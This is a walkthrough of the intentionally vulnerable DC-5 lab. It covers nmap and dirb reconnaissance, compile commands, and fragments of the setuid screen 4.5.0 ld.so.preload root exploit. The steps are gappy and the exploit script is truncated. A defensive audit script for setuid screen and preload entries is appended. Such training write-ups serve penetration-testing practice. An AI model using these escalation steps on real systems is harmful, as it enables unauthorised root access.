Lab name: DC: 5
Lab release date: 2019-4-21
Lab URL: https://www.vulnhub.com/entry/dc-5,314/
Lab description:
DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).
As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
But if you're really, really stuck, you can watch this video which shows the first step.
VMware virtual machine (bridged mode)
Get the target's IP address
nmap -sn 192.168.3.0/24
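Use nmap to look at the target's port information, system information and so on
First, look at the web service on port 80
There is no obvious information, just a contact form; scan the directories with dirb
The scan did not find any useful pages, and trying some readme files turned up nothing either
Keep trying the contact form
After submitting, the year changed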
gcc -fPIC -shared -ldl -o libhax.so libhax.c
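It reports an error, but the output file is produced
Step 2: create rootshell and compile the file (compiling on the attacking machine is fine)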
gcc -o rootshell rootshell.c
Step 3: modify the .sh file
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
screen -ls # screen itself is setuid,so...
/tmp/rootshell
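When saving the file, the runtime environment must be specified, otherwise it will throw an error
Upload these three files to the target
Download libhax.so directly (it could not be downloaded through the Apache service)
Using python -m http.server port, it can be downloaded; after chmod 777, root privileges are obtained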
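
From the defender's side, the screenroot.sh header above names the two conditions this privilege escalation depends on: a setuid screen binary and a written ld.so.preload. The following audit is an added example, not part of the original write-up or the exploit author's code; the function names and the ROOT argument (which lets it run against a mounted disk image) are hypothetical.

```shell
#!/bin/sh
# Added example, not from the write-up or the exploit author.
# Audits a filesystem tree for the two conditions named in the
# screenroot.sh header: a setuid screen binary and ld.so.preload entries.
# Function names and the ROOT argument are hypothetical.

# List setuid regular files whose name starts with "screen" under ROOT.
find_setuid_screen() {
    find "${1:-/}" -xdev -type f -name 'screen*' -perm -4000 2>/dev/null
}

# Print active (non-blank, non-comment) lines of ROOT/etc/ld.so.preload.
# Returns non-zero when the file is absent or has no active entries.
preload_entries() {
    audit_file="${1%/}/etc/ld.so.preload"
    [ -f "$audit_file" ] || return 1
    grep -Ev '^[[:space:]]*(#|$)' "$audit_file"
}

# Report findings for ROOT; returns 1 if anything needs review.
audit_host() {
    audit_root="${1:-/}"
    audit_status=0
    audit_bins=$(find_setuid_screen "$audit_root") || true
    audit_libs=$(preload_entries "$audit_root") || true
    if [ -n "$audit_bins" ]; then
        printf '%s\n' "$audit_bins" | sed 's/^/REVIEW setuid screen: /'
        audit_status=1
    fi
    if [ -n "$audit_libs" ]; then
        printf '%s\n' "$audit_libs" | sed 's/^/REVIEW ld.so.preload entry: /'
        audit_status=1
    fi
    return "$audit_status"
}
```

Source the file and call audit_host / on a live host, or pass the mount point of an image; a return status of 1 means at least one line needs review.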